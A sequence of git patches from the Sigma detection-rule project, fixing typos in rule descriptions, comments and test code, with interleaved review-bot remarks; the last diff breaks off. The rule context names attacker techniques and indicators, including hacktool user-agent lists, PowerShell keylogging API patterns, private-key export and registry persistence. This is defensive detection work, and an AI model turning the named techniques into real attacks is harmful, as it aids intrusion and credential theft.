From: Austin Songer Date: Wed, 18 Aug 2021 18:53:28 +0000 Subject: [PATCH 0434/1367] Fixed Spelling --- README.md | 2 +- .../azure/azure_kubernetes_secret_or_config_object_access.yml | 2 +- .../azure/azure_network_virtual_device_modified_or_deleted.yml | 2 +- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 2 +- rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 424533b5..2aeae254 100644 --- a/README.md +++ b/README.md @@ -304,7 +304,7 @@ S2AN was developed to be used as a standalone tool or as part of a CI/CD pipelin The directory `contrib` contains scripts that were contributed by the community: -* `sigma2elastalert.py`i by David Routin: A script that converts Sigma rules to Elastalert configurations. This tool +* `sigma2elastalert.py`i by David Routine: A script that converts Sigma rules to Elastalert configurations. This tool uses *sigmac* and expects it in its path. These tools are not part of the main toolchain and maintained separately by their authors. diff --git a/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml b/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml index 7fa6cbb9..108e64c2 100644 --- a/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml +++ b/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml @@ -1,6 +1,6 @@ title: Azure Kubernetes Secret or Config Object Access id: 7ee0b4aa-d8d4-4088-b661-20efdf41a04c -description: Identifies when a Kubernetes account access a sensitve objects such as configmaps or secrets. +description: Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets. author: Austin Songer @austinsonger status: experimental date: 2021/08/07 
diff --git a/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml index 4034c0ce..fc3643fc 100644 --- a/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml +++ b/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml @@ -1,6 +1,6 @@ title: Azure Virtual Network Device Modified or Deleted id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 -description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual applicance, vitual hub, or virtual router. +description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. author: Austin Songer status: experimental date: 2021/08/08 diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 3ba671a0..c5d17b32 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -17,4 +17,4 @@ tags: - attack.impact - attack.t1565 falsepositives: - - Unkown + - Unknown diff --git a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml index cbd76394..629dff39 100644 --- a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -19,4 +19,4 @@ level: medium tags: - attack.impact falsepositives: - - Unkown + - Unknown From c9128687eef1e0d4ff67e30dd8ce042e0db4d3f9 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Wed, 18 Aug 2021 18:58:20 +0000 Subject: [PATCH 0435/1367] Spelling Errors on Rules --- .../network/zeek/zeek_default_cobalt_strike_certificate.yml | 2 +- rules/proxy/proxy_baby_shark.yml | 2 +- rules/proxy/proxy_ua_hacktool.yml | 2 +- rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml | 2 +- rules/web/web_expl_exchange_cve_2021_28480.yml | 2 +- rules/windows/builtin/win_hidden_user_creation.yml | 2 +- .../win_susp_failed_logons_single_source_kerberos.yml | 2 +- .../win_susp_failed_logons_single_source_kerberos2.yml | 2 +- .../win_susp_failed_logons_single_source_kerberos3.yml | 2 +- .../windows/builtin/win_susp_logon_explicit_credentials.yml | 2 +- rules/windows/other/win_lateral_movement_condrv.yml | 2 +- rules/windows/powershell/powershell_keylogging.yml | 2 +- .../powershell_suspicious_export_pfxcertificate.yml | 2 +- .../sysmon_cobaltstrike_bof_injection_pattern.yml | 2 +- .../process_access/sysmon_direct_syscall_ntopenprocess.yml | 2 +- .../sysmon_littlecorporal_generated_maldoc.yml | 2 +- .../sysmon_accesschk_usage_after_priv_escalation.yml | 2 +- rules/windows/process_creation/win_apt_hafnium.yml | 2 +- .../win_exchange_proxylogon_oabvirtualdir.yml | 2 +- .../process_creation/win_hiding_malware_in_fonts_folder.yml | 2 +- .../process_creation/win_lolbas_execution_of_wuauclt.yml | 2 +- .../process_creation/win_lolbin_execution_via_winget.yml | 2 +- .../process_creation/win_script_event_consumer_spawn.yml | 2 +- rules/windows/process_creation/win_susp_csi.yml | 2 +- rules/windows/process_creation/win_susp_vboxdrvInst.yml | 2 +- rules/windows/process_creation/win_susp_winrm_execution.yml | 2 +- rules/windows/process_creation/win_wmi_spwns_powershell.yml | 2 +- .../process_creation/win_wmiprvse_spawning_process.yml | 4 ++-- rules/windows/registry_event/sysmon_office_test_regadd.yml | 2 +- .../windows/registry_event/sysmon_susp_atbroker_change.yml | 6 +++--- .../registry_event/win_outlook_registry_todaypage.yml | 2 +- 
.../windows/registry_event/win_outlook_registry_webview.yml | 2 +- 32 files changed, 35 insertions(+), 35 deletions(-) diff --git a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml index 6dad3ef8..a4e69cc5 100644 --- a/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml +++ b/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml @@ -1,6 +1,6 @@ title: Default Cobalt Strike Certificate id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 -description: Detects the presense of default Cobalt Strike certificate in the HTTPS traffic +description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic author: Bhabesh Raj date: 2021/06/23 references: diff --git a/rules/proxy/proxy_baby_shark.yml b/rules/proxy/proxy_baby_shark.yml index 8fc52699..5b6f980b 100644 --- a/rules/proxy/proxy_baby_shark.yml +++ b/rules/proxy/proxy_baby_shark.yml @@ -1,7 +1,7 @@ title: BabyShark Agent Pattern id: 304810ed-8853-437f-9e36-c4975c3dfd7e status: experimental -description: Detects Baby Shark C2 Framework communcation patterns +description: Detects Baby Shark C2 Framework communication patterns author: Florian Roth date: 2021/06/09 references: diff --git a/rules/proxy/proxy_ua_hacktool.yml b/rules/proxy/proxy_ua_hacktool.yml index 1e2f9653..bbb8a780 100644 --- a/rules/proxy/proxy_ua_hacktool.yml +++ b/rules/proxy/proxy_ua_hacktool.yml @@ -13,7 +13,7 @@ logsource: detection: selection: c-useragent|contains: - # Vulnerbility scanner and brute force tools + # Vulnerability scanner and brute force tools - '(hydra)' - ' arachni/' - ' BFAC ' diff --git a/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml b/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml index a5dbd897..ed2adbaa 100644 --- a/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml +++ b/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml 
@@ -30,5 +30,5 @@ detection: - 'metric' condition: selection1 and selection2 falsepositives: - - Vulnerability Scaning/Pentesting + - Vulnerability Scanning/Pentesting level: high diff --git a/rules/web/web_expl_exchange_cve_2021_28480.yml b/rules/web/web_expl_exchange_cve_2021_28480.yml index 62cd6efd..b3b3f21b 100644 --- a/rules/web/web_expl_exchange_cve_2021_28480.yml +++ b/rules/web/web_expl_exchange_cve_2021_28480.yml @@ -1,7 +1,7 @@ title: Exchange Exploitation CVE-2021-28480 id: a2a9d722-0acb-4096-bccc-daaf91a5037b status: experimental -description: Detects successfull exploitation of Exchange vulnerability as reported in CVE-2021-28480 +description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480 references: - https://twitter.com/GossiTheDog/status/1392965209132871683?s=20 author: Florian Roth diff --git a/rules/windows/builtin/win_hidden_user_creation.yml b/rules/windows/builtin/win_hidden_user_creation.yml index 8dee8a7c..87c55ef8 100644 --- a/rules/windows/builtin/win_hidden_user_creation.yml +++ b/rules/windows/builtin/win_hidden_user_creation.yml @@ -21,5 +21,5 @@ fields: - EventCode - AccountName falsepositives: - - unkown + - unknown level: high diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos.yml b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos.yml index 5f7fb4bc..71c939ef 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos.yml @@ -24,7 +24,7 @@ detection: - selection and not filter_computer | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - - Missconfigured systems + - Misconfigured systems - Remote administration tools - VPN terminators - Multiuser systems like Citrix server farms 
diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos2.yml b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos2.yml index 480663d1..1d45f289 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos2.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos2.yml @@ -24,7 +24,7 @@ detection: - selection and not filter_computer | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - - Missconfigured systems + - Misconfigured systems - Remote administration tools - VPN terminators - Multiuser systems like Citrix server farms diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos3.yml b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos3.yml index 8bc4d8b8..98f6e1d7 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos3.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source_kerberos3.yml @@ -24,7 +24,7 @@ detection: - selection and not filter_computer | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - - Missconfigured systems + - Misconfigured systems - Remote administration tools - VPN terminators - Multiuser systems like Citrix server farms diff --git a/rules/windows/builtin/win_susp_logon_explicit_credentials.yml b/rules/windows/builtin/win_susp_logon_explicit_credentials.yml index 8d2c6c66..e947b6ae 100644 --- a/rules/windows/builtin/win_susp_logon_explicit_credentials.yml +++ b/rules/windows/builtin/win_susp_logon_explicit_credentials.yml @@ -1,4 +1,4 @@ -title: Suspicous Remote Logon with Explicit Credentials +title: Suspicious Remote Logon with Explicit Credentials id: 941e5c45-cda7-4864-8cea-bbb7458d194a status: experimental description: Detects suspicious processes logging on with explicit credentials 
diff --git a/rules/windows/other/win_lateral_movement_condrv.yml b/rules/windows/other/win_lateral_movement_condrv.yml index 73713305..796b506f 100644 --- a/rules/windows/other/win_lateral_movement_condrv.yml +++ b/rules/windows/other/win_lateral_movement_condrv.yml @@ -24,5 +24,5 @@ detection: ObjectName: '\Device\ConDrv' condition: selection falsepositives: - - Penetration tests where lateral movement has occured. This event will be created on the target host. + - Penetration tests where lateral movement has occurred. This event will be created on the target host. level: high diff --git a/rules/windows/powershell/powershell_keylogging.yml b/rules/windows/powershell/powershell_keylogging.yml index a3e3679e..82274561 100644 --- a/rules/windows/powershell/powershell_keylogging.yml +++ b/rules/windows/powershell/powershell_keylogging.yml @@ -19,7 +19,7 @@ detection: EventID: 4104 selection_basic: ScriptBlockText|contains: 'Get-Keystrokes' - selection_high: # want to run in backgroud and keybord + selection_high: # want to run in background and keyboard ScriptBlockText|contains|all: - 'Get-ProcAddress user32.dll GetAsyncKeyState' - 'Get-ProcAddress user32.dll GetForegroundWindow' diff --git a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml index 6f1dfeba..6a621346 100644 --- a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml +++ b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml 
@@ -1,7 +1,7 @@ title: Suspicious Export-PfxCertificate id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c status: experimental -description: Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal provate keys from compromised machines +description: Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate diff --git a/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml index 424ca2bc..de11db2d 100644 --- a/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml +++ b/rules/windows/process_access/sysmon_cobaltstrike_bof_injection_pattern.yml @@ -18,7 +18,7 @@ detection: - '0x1fffff' condition: selection falsepositives: - - unkown + - unknown level: high tags: - attack.execution diff --git a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml index 433cc150..fb8cad71 100755 --- a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml @@ -14,7 +14,7 @@ detection: CallTrace|startswith: 'UNKNOWN' condition: selection falsepositives: - - unkown + - unknown level: critical tags: - attack.execution diff --git a/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml b/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml index b9b54d10..7d79eb57 100644 --- a/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml +++ b/rules/windows/process_access/sysmon_littlecorporal_generated_maldoc.yml 
@@ -17,7 +17,7 @@ detection: - 'UNKNOWN' condition: selection falsepositives: - - unkown + - unknown level: high tags: - attack.execution diff --git a/rules/windows/process_creation/sysmon_accesschk_usage_after_priv_escalation.yml b/rules/windows/process_creation/sysmon_accesschk_usage_after_priv_escalation.yml index 0f53941d..75785c5a 100644 --- a/rules/windows/process_creation/sysmon_accesschk_usage_after_priv_escalation.yml +++ b/rules/windows/process_creation/sysmon_accesschk_usage_after_priv_escalation.yml @@ -1,6 +1,6 @@ title: Accesschk Usage After Privilege Escalation id: c625d754-6a3d-4f65-9c9a-536aea960d37 -description: Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify if a privilege escalation process succesfull or not +description: Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify if a privilege escalation process successful or not status: experimental author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 diff --git a/rules/windows/process_creation/win_apt_hafnium.yml b/rules/windows/process_creation/win_apt_hafnium.yml index 042fe15a..14772b4b 100644 --- a/rules/windows/process_creation/win_apt_hafnium.yml +++ b/rules/windows/process_creation/win_apt_hafnium.yml @@ -1,6 +1,6 @@ title: Exchange Exploitation Activity id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7 -description: Detects activity observed by different researchers to be HAFNIUM group acitivity (or related) on Exchange servers +description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers author: Florian Roth date: 2021/03/09 modified: 2021/03/16 diff --git a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml index 64adeae7..96e0ed82 100644 
--- a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml +++ b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml @@ -1,7 +1,7 @@ title: ProxyLogon MSExchange OabVirtualDirectory id: 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 status: experimental -description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invokation of Set-OabVirtualDirectory +description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory references: - https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c author: Florian Roth diff --git a/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml b/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml index 811d34dc..6bc345d0 100644 --- a/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml +++ b/rules/windows/process_creation/win_hiding_malware_in_fonts_folder.yml @@ -1,6 +1,6 @@ title: Writing Of Malicious Files To The Fonts Folder id: ae9b0bd7-8888-4606-b444-0ed7410cb728 -description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesnt require admin privillege to be written and executed from. +description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. references: - https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/ date: 2020/21/04 diff --git a/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml b/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml index ffe74da9..c603644e 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml +++ b/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml 
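Review bot: The corrected description line in the fonts-folder hunk still carries `privillege`; it should read `admin privilege`. The context line `date: 2020/21/04` is not a valid YYYY/MM/DD value (month 21) and presumably means 2020/04/21, which the repository's date-format checks may reject; it is outside the changed lines but worth fixing in the same spelling pass. The rest of the hunk is a plain typo fix.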
@@ -23,7 +23,7 @@ detection: - 'UpdateDeploymentProvider.dll /ClassId' condition: selection and not filter falsepositives: - - Wuaueng.dll which is a module belonging to Microsoft Wnidows Update. + - Wuaueng.dll which is a module belonging to Microsoft Windows Update. fields: - CommandLine level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/win_lolbin_execution_via_winget.yml b/rules/windows/process_creation/win_lolbin_execution_via_winget.yml index ff0ef78b..9ff60bf8 100644 --- a/rules/windows/process_creation/win_lolbin_execution_via_winget.yml +++ b/rules/windows/process_creation/win_lolbin_execution_via_winget.yml @@ -20,7 +20,7 @@ detection: - '.*(?i)winget install (--m|-m).*' condition: selection falsepositives: - - Admin activity installing packages not in the official Microsoft repo. Winget probably wont be used by most users. + - Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users. fields: - CommandLine level: medium \ No newline at end of file diff --git a/rules/windows/process_creation/win_script_event_consumer_spawn.yml b/rules/windows/process_creation/win_script_event_consumer_spawn.yml index 7c525990..ddcae5ee 100644 --- a/rules/windows/process_creation/win_script_event_consumer_spawn.yml +++ b/rules/windows/process_creation/win_script_event_consumer_spawn.yml @@ -1,4 +1,4 @@ -title: Script Event Consumer Spawning Processs +title: Script Event Consumer Spawning Process id: f6d1dd2f-b8ce-40ca-bc23-062efb686b34 status: experimental description: Detects a suspicious child process of Script Event Consumer (scrcons.exe). diff --git a/rules/windows/process_creation/win_susp_csi.yml b/rules/windows/process_creation/win_susp_csi.yml index ee19fca9..d34670f5 100644 --- a/rules/windows/process_creation/win_susp_csi.yml +++ b/rules/windows/process_creation/win_susp_csi.yml 
@@ -1,6 +1,6 @@ title: Suspicious Csi.exe Usage id: 40b95d31-1afc-469e-8d34-9a3a667d058e -description: Csi.exe is a signed binary from Micosoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' +description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' status: experimental author: Konstantin Grishchenko, oscd.community date: 2020/10/17 diff --git a/rules/windows/process_creation/win_susp_vboxdrvInst.yml b/rules/windows/process_creation/win_susp_vboxdrvInst.yml index 024b5149..9b1eacab 100644 --- a/rules/windows/process_creation/win_susp_vboxdrvInst.yml +++ b/rules/windows/process_creation/win_susp_vboxdrvInst.yml @@ -1,6 +1,6 @@ title: Suspicious VBoxDrvInst.exe Parameters id: b7b19cb6-9b32-4fc4-a108-73f19acfe262 -description: Detect VBoxDrvInst.exe run whith parameters allowing processing INF file. This allows to create values in the registry and install drivers. +description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys status: experimental author: Konstantin Grishchenko, oscd.community diff --git a/rules/windows/process_creation/win_susp_winrm_execution.yml b/rules/windows/process_creation/win_susp_winrm_execution.yml index 2ecb2b39..108b1c27 100644 --- a/rules/windows/process_creation/win_susp_winrm_execution.yml +++ b/rules/windows/process_creation/win_susp_winrm_execution.yml 
@@ -1,6 +1,6 @@ title: Remote Code Execute via Winrm.vbs id: 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 -description: Detects an attempt to execude code or create service on remote host via winrm.vbs. +description: Detects an attempt to execute code or create service on remote host via winrm.vbs. status: experimental references: - https://twitter.com/bohops/status/994405551751815170 diff --git a/rules/windows/process_creation/win_wmi_spwns_powershell.yml b/rules/windows/process_creation/win_wmi_spwns_powershell.yml index dcd52ef3..90a71de0 100644 --- a/rules/windows/process_creation/win_wmi_spwns_powershell.yml +++ b/rules/windows/process_creation/win_wmi_spwns_powershell.yml @@ -25,7 +25,7 @@ detection: - '\powershell.exe' filter_null1: CommandLine: 'null' - filter_null2: # some backends need the null value in a seperate expression + filter_null2: # some backends need the null value in a separate expression CommandLine: null condition: selection and not filter_null1 and not filter_null2 falsepositives: diff --git a/rules/windows/process_creation/win_wmiprvse_spawning_process.yml b/rules/windows/process_creation/win_wmiprvse_spawning_process.yml index d5a59f6e..e0da3a8c 100644 --- a/rules/windows/process_creation/win_wmiprvse_spawning_process.yml +++ b/rules/windows/process_creation/win_wmiprvse_spawning_process.yml @@ -27,9 +27,9 @@ detection: - Image|endswith: - '\WmiPrvSE.exe' - '\WerFault.exe' - filter_null1: # some backends need the null value in a seperate expression + filter_null1: # some backends need the null value in a separate expression LogonId: null - filter_null2: # some backends need the null value in a seperate expression + filter_null2: # some backends need the null value in a separate expression SubjectLogonId: null condition: selection and not filter and not filter_null1 and not filter_null2 falsepositives: 
diff --git a/rules/windows/registry_event/sysmon_office_test_regadd.yml b/rules/windows/registry_event/sysmon_office_test_regadd.yml index c6d2069e..f8ec6212 100644 --- a/rules/windows/registry_event/sysmon_office_test_regadd.yml +++ b/rules/windows/registry_event/sysmon_office_test_regadd.yml @@ -1,7 +1,7 @@ title: Office Application Startup - Office Test id: 3d27f6dd-1c74-4687-b4fa-ca849d128d1c status: experimental -description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed everytime an Office application is started +description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started references: - https://attack.mitre.org/techniques/T1137/002/ author: omkar72 diff --git a/rules/windows/registry_event/sysmon_susp_atbroker_change.yml b/rules/windows/registry_event/sysmon_susp_atbroker_change.yml index 55850ba3..2800e4ee 100644 --- a/rules/windows/registry_event/sysmon_susp_atbroker_change.yml +++ b/rules/windows/registry_event/sysmon_susp_atbroker_change.yml @@ -1,6 +1,6 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistance with usage of ATs +description: Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ @@ -18,9 +18,9 @@ logsource: detection: creation: TargetObject|contains: 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs' - persistance: + persistence: TargetObject|contains: 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' - condition: creation or persistance + condition: creation or persistence falsepositives: - Creation of non-default, legitimate AT. level: high 
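Review bot: The corrected description line in the sysmon_susp_atbroker_change.yml hunk still carries the misspelling "Assisitive" right next to the fixed "persistence"; since this is a spelling pass, `description: Detects creation/modification of Assistive Technology applications and persistence with usage of ATs` would finish the line. The `persistance` to `persistence` rename of the detection key and of the `condition:` line are consistent with each other, so the detection logic itself is unchanged.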
diff --git a/rules/windows/registry_event/win_outlook_registry_todaypage.yml b/rules/windows/registry_event/win_outlook_registry_todaypage.yml index 71a6dca9..7b44bfde 100644 --- a/rules/windows/registry_event/win_outlook_registry_todaypage.yml +++ b/rules/windows/registry_event/win_outlook_registry_todaypage.yml @@ -1,6 +1,6 @@ title: Persistent Outlook Landing Pages id: 487bb375-12ef-41f6-baae-c6a1572b4dd1 -description: Detects the manipulation of persistant URLs which could execute malicious code +description: Detects the manipulation of persistent URLs which could execute malicious code status: experimental references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70 diff --git a/rules/windows/registry_event/win_outlook_registry_webview.yml b/rules/windows/registry_event/win_outlook_registry_webview.yml index 7033f1c0..62c4804f 100644 --- a/rules/windows/registry_event/win_outlook_registry_webview.yml +++ b/rules/windows/registry_event/win_outlook_registry_webview.yml @@ -1,6 +1,6 @@ title: Persistent Outlook Landing Pages id: ddd171b5-2cc6-4975-9e78-f0eccd08cc76 -description: Detects the manipulation of persistant URLs which can be malicious +description: Detects the manipulation of persistent URLs which can be malicious status: experimental references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70 From e039f9127273c533e3e70c929e219b3a945adbe9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 18 Aug 2021 19:00:57 +0000 Subject: [PATCH 0436/1367] Spelling --- tests/test_rules.py | 6 +++--- tools/sigma/backends/devo.py | 2 +- tools/sigma/filter.py | 2 +- tools/sigma/sigma-uuid.py | 2 +- tools/sigma/sigma_uuid.py | 2 +- tools/sigma/sigmac.py | 2 +- 6 files changed, 8 insertions(+), 8 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index 8abaaf80..d34bd849 100755 --- a/tests/test_rules.py 
+++ b/tests/test_rules.py @@ -344,7 +344,7 @@ class TestRules(unittest.TestCase): status_str = self.get_rule_part(file_path=file, part_name="status") if status_str: if not status_str in valid_status: - print(Fore.YELLOW + "Rule {} has a invalide 'status' (check wiki).".format(file)) + print(Fore.YELLOW + "Rule {} has a invalid 'status' (check wiki).".format(file)) faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + @@ -365,7 +365,7 @@ class TestRules(unittest.TestCase): print(Fore.YELLOW + "Rule {} has no field 'level'.".format(file)) faulty_rules.append(file) elif not level_str in valid_level: - print(Fore.YELLOW + "Rule {} has a invalide 'level' (check wiki).".format(file)) + print(Fore.YELLOW + "Rule {} has a invalid 'level' (check wiki).".format(file)) faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + @@ -562,7 +562,7 @@ class TestRules(unittest.TestCase): for key in logsource: if key.lower() not in valid_logsource: print(Fore.RED + "Rule {} has a logsource with an invalid field ({})".format(file, key)) - valide = False + valid = False if not valid: faulty_rules.append(file) diff --git a/tools/sigma/backends/devo.py b/tools/sigma/backends/devo.py index 3d6db147..df0dc407 100644 --- a/tools/sigma/backends/devo.py +++ b/tools/sigma/backends/devo.py 
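Review bot: The `valide = False` to `valid = False` change in the third hunk is a behavioural fix rather than a spelling fix: as far as the hunk shows, the old assignment went to a dead variable, so the `if not valid:` check below it could never trip on an invalid logsource key and rules with bad logsource fields passed the test silently. That is worth stating in the commit message, since the rule set may now fail this test where it previously passed. The two message edits in the first hunks still read "a invalid"; `"Rule {} has an invalid 'status' (check wiki)."` and the matching `'level'` line would complete the fix. The enclosing test methods start outside the hunks.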
@@ -40,7 +40,7 @@ class DevoBackend(SingleTextQueryBackend): mapMulti = "has(%s, %s)" # Syntax for field/value conditions. First %s is fieldname, second is value mapWildcard = "matches(%s, nameglob(%s))" # Syntax for globbing conditions mapRe = "matches(%s, %s)" # Syntax for regex conditions that already were transformed by SigmaRegularExpressionModifier - mapContains = "toktains(%s, %s, true, true)" # Systax for token value searches + mapContains = "toktains(%s, %s, true, true)" # Syntax for token value searches mapListValueExpression = "%s or %s" # Syntax for field/value condititons where map value is a list mapFullTextSearch = "weaktoktains(raw, \"%s\", true, true)" # Expression for full text searches typedValueExpression = { diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index 175f1284..f33b5f0b 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -65,7 +65,7 @@ class SigmaRuleFilter: if self.status not in self.STATES: raise SigmaRuleFilterParseException("Unknown status '%s' in condition '%s'" % (self.status, cond)) elif cond.startswith("tlp="): - self.tlp = cond[cond.index("=") + 1:].upper() #tlp is allways uppercase + self.tlp = cond[cond.index("=") + 1:].upper() #tlp is always uppercase elif cond.startswith("target="): self.target = cond[cond.index("=") + 1:].lower() # lower to make caseinsensitive elif cond.startswith("logsource="): diff --git a/tools/sigma/sigma-uuid.py b/tools/sigma/sigma-uuid.py index 85a9ab61..ec86a199 100755 --- a/tools/sigma/sigma-uuid.py +++ b/tools/sigma/sigma-uuid.py 
